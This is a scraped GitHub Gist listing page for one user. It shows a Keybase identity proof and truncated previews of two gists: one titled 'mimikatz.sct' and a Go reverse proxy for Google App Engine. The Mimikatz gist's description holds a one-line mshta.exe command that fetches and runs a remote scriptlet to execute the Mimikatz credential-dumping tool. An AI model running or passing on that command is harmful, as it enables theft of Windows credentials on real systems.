Skip to content

Instantly share code, notes, and snippets.

Keybase proof

I hereby claim:

  • I am rmikehodges on github.
  • I am mikehodges (https://keybase.io/mikehodges) on keybase.
  • I have a public key ASBewFxIpsBiTL4Y2rJATkTLGQjRzSUqF6eSI_QhMDz9Mwo

To claim this, I am signing this object:

@rmikehodges
rmikehodges / mimikatz.sct
Created January 19, 2018 15:22
Mimikatz inside mshta.exe - "mshta.exe javascript:a=GetObject("script:http://127.0.0.1:8000/mshta.sct").Exec(); log coffee exit"
<?XML version="1.0"?>
<scriptlet>
<registration
description="Bandit"
progid="Bandit"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
@rmikehodges
rmikehodges / gaereverseproxy.go
Created January 18, 2018 08:25 — forked from pokstad/gaereverseproxy.go
Google App Engine reverse proxy in Golang
// Copyright 2011 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// HTTP reverse proxy handler
package goengine
import (
"io"